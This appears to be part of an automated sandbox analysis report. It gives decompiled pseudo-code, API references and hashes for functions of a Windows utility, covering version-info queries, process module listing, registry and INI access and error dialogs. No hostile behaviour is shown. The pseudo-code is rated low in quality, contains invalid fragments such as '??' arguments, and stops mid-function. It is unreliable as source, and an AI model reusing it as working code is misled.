                                                                                                                            0x00000000
                                                                                                                            0x0040b047
                                                                                                                            0x0040b02e
                                                                                                                            0x0040b034
                                                                                                                            0x0040b03c
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                                            • wcscat.MSVCRT ref: 0040AFE2
                                                                                                                            • wcscat.MSVCRT ref: 0040AFF3
                                                                                                                            • wcscat.MSVCRT ref: 0040B002
                                                                                                                            • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                                              • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                              • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                              • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                                                                              • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                            • String ID: \StringFileInfo\
                                                                                                                            • API String ID: 393120378-2245444037
                                                                                                                            • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                            • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                                            • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                            • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: _snwprintfwcscpy
                                                                                                                            • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                            • API String ID: 999028693-502967061
                                                                                                                            • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                            • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                                            • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                            • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 38%
                                                                                                                            			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0) {
					L12:
					__eflags =  *0x4101b8 - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E00409510(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x4101bc - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x40f840() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
										E0040920A( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x40f844() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E00409510(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}


























                                                                                                                            0x004092f3
                                                                                                                            0x004092fb
                                                                                                                            0x00409303
                                                                                                                            0x00409305
                                                                                                                            0x00409310
                                                                                                                            0x00409433
                                                                                                                            0x00409433
                                                                                                                            0x00409439
                                                                                                                            0x0040943f
                                                                                                                            0x00409445
                                                                                                                            0x0040944b
                                                                                                                            0x0040944e
                                                                                                                            0x00409452
                                                                                                                            0x00409466
                                                                                                                            0x0040946e
                                                                                                                            0x00409475
                                                                                                                            0x004094f7
                                                                                                                            0x004094f7
                                                                                                                            0x004094f9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409488
                                                                                                                            0x00409494
                                                                                                                            0x004094a5
                                                                                                                            0x004094a9
                                                                                                                            0x004094b5
                                                                                                                            0x004094c3
                                                                                                                            0x004094c6
                                                                                                                            0x004094d5
                                                                                                                            0x004094dc
                                                                                                                            0x004094e1
                                                                                                                            0x004094e3
                                                                                                                            0x004094f1
                                                                                                                            0x00000000
                                                                                                                            0x004094f1
                                                                                                                            0x00000000
                                                                                                                            0x004094e3
                                                                                                                            0x00000000
                                                                                                                            0x004094f7
                                                                                                                            0x00409452
                                                                                                                            0x00409316
                                                                                                                            0x00409316
                                                                                                                            0x0040931c
                                                                                                                            0x00000000
                                                                                                                            0x00409322
                                                                                                                            0x0040932b
                                                                                                                            0x00409333
                                                                                                                            0x00409337
                                                                                                                            0x00409341
                                                                                                                            0x00409342
                                                                                                                            0x0040934e
                                                                                                                            0x0040934f
                                                                                                                            0x00409358
                                                                                                                            0x0040935e
                                                                                                                            0x0040935e
                                                                                                                            0x00409363
                                                                                                                            0x0040936b
                                                                                                                            0x0040936d
                                                                                                                            0x00409377
                                                                                                                            0x00409385
                                                                                                                            0x0040938d
                                                                                                                            0x0040939d
                                                                                                                            0x004093a5
                                                                                                                            0x004093ac
                                                                                                                            0x004093b4
                                                                                                                            0x004093c5
                                                                                                                            0x004093c9
                                                                                                                            0x004093da
                                                                                                                            0x004093df
                                                                                                                            0x004093e5
                                                                                                                            0x004093e6
                                                                                                                            0x004093ea
                                                                                                                            0x004093f6
                                                                                                                            0x004093fc
                                                                                                                            0x00409407
                                                                                                                            0x00409407
                                                                                                                            0x0040941d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409423
                                                                                                                            0x00409428
                                                                                                                            0x00409375
                                                                                                                            0x00409375
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040942e
                                                                                                                            0x00000000
                                                                                                                            0x00409428
                                                                                                                            0x00409377
                                                                                                                            0x0040936d
                                                                                                                            0x004094fb
                                                                                                                            0x004094ff
                                                                                                                            0x004094ff
                                                                                                                            0x00409337
                                                                                                                            0x0040931c
                                                                                                                            0x0040950f

                                                                                                                            APIs
                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                                            • memset.MSVCRT ref: 0040938D
                                                                                                                            • memset.MSVCRT ref: 0040939D
                                                                                                                              • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                                            • memset.MSVCRT ref: 00409488
                                                                                                                            • wcscpy.MSVCRT ref: 004094A9
                                                                                                                            • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3300951397-0
                                                                                                                            • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                            • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                                            • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                            • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 44%
                                                                                                                            			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                                            0x00402ed7
                                                                                                                            0x00402eee
                                                                                                                            0x00402ef8
                                                                                                                            0x00402f00
                                                                                                                            0x00402f01
                                                                                                                            0x00402f05
                                                                                                                            0x00402f0a
                                                                                                                            0x00402f1a
                                                                                                                            0x00402f30

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 19018683-0
                                                                                                                            • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                            • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                                            • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                            • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 50%
                                                                                                                            			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}










                                                                                                                            0x004079a4
                                                                                                                            0x004079b8
                                                                                                                            0x004079bd
                                                                                                                            0x004079c2
                                                                                                                            0x004079c5
                                                                                                                            0x004079c5
                                                                                                                            0x004079db
                                                                                                                            0x004079f7
                                                                                                                            0x00407a06
                                                                                                                            0x00407a0c
                                                                                                                            0x00407a11
                                                                                                                            0x00407a13
                                                                                                                            0x00407a14
                                                                                                                            0x00407a17
                                                                                                                            0x00407a18
                                                                                                                            0x00407a1d
                                                                                                                            0x00407a22
                                                                                                                            0x00407a25
                                                                                                                            0x00407a2a
                                                                                                                            0x00407a35
                                                                                                                            0x00407a3a
                                                                                                                            0x00407a3b
                                                                                                                            0x00407a40
                                                                                                                            0x00407a52

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 004079DB
                                                                                                                              • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                                              • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                              • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                            • _snwprintf.MSVCRT ref: 00407A25
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                            • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                            • API String ID: 1775345501-2769808009
                                                                                                                            • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                            • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                                            • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                            • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 64%
                                                                                                                            			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                                                                            0x00404683
                                                                                                                            0x00404692
                                                                                                                            0x00404699
                                                                                                                            0x0040469b
                                                                                                                            0x004046af
                                                                                                                            0x004046ba
                                                                                                                            0x004046bc
                                                                                                                            0x004046c7
                                                                                                                            0x004046cc
                                                                                                                            0x004046cd
                                                                                                                            0x004046ee
                                                                                                                            0x004046f3
                                                                                                                            0x004046fa
                                                                                                                            0x004046fa
                                                                                                                            0x004046ee
                                                                                                                            0x00404705

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 004046AF
                                                                                                                            • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen_snwprintfmemset
                                                                                                                            • String ID: %s\shell\%s
                                                                                                                            • API String ID: 1458959524-3196117466
                                                                                                                            • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                            • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                                            • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                            • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 16%
                                                                                                                            			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}




                                                                                                                            0x00409d5f
                                                                                                                            0x00409d67
                                                                                                                            0x00409d70
                                                                                                                            0x00409ddb
                                                                                                                            0x00409d72
                                                                                                                            0x00409d74
                                                                                                                            0x00409db2
                                                                                                                            0x00409d84
                                                                                                                            0x00409d84
                                                                                                                            0x00409d8c
                                                                                                                            0x00409d8d
                                                                                                                            0x00409d98
                                                                                                                            0x00409d9d
                                                                                                                            0x00409d9e
                                                                                                                            0x00409da6
                                                                                                                            0x00409daf
                                                                                                                            0x00409daf
                                                                                                                            0x00409dc3
                                                                                                                            0x00409dc3

                                                                                                                            APIs
                                                                                                                            • wcschr.MSVCRT ref: 00409D79
                                                                                                                            • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 00409DD4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                            • String ID: "%s"
                                                                                                                            • API String ID: 1343145685-3297466227
                                                                                                                            • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                            • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                                            • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                            • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 38%
                                                                                                                            			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                                                                            0x004047d2
                                                                                                                            0x004047da
                                                                                                                            0x004047e0
                                                                                                                            0x004047e4
                                                                                                                            0x004047ec
                                                                                                                            0x004047ec
                                                                                                                            0x004047f5
                                                                                                                            0x00404800
                                                                                                                            0x00404801
                                                                                                                            0x00404802
                                                                                                                            0x0040480d
                                                                                                                            0x00404812
                                                                                                                            0x00404813
                                                                                                                            0x00404834

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                                            • _snwprintf.MSVCRT ref: 00404813
                                                                                                                            • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastMessage_snwprintf
                                                                                                                            • String ID: Error$Error %d: %s
                                                                                                                            • API String ID: 313946961-1552265934
                                                                                                                            • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                            • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                                            • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                            • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 90%
                                                                                                                            			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
